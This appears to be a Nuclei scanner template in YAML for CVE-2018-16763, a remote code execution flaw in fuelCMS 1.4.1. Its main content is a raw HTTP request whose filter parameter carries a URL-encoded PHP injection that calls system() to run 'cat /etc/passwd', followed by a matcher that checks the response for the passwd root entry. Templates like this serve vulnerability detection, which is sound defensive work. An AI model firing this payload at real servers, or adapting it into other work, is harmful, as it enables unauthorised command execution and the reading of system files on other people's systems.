28 lines
766 B
YAML
28 lines
766 B
YAML
id: CVE-2018-16763
|
|
|
|
info:
|
|
name: fuelCMS 1.4.1 - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
tags: cve,cve2018,fuelcms,rce
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/47138
|
|
- https://www.getfuelcms.com/ # Vendor Homepage
|
|
- https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Software Link
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|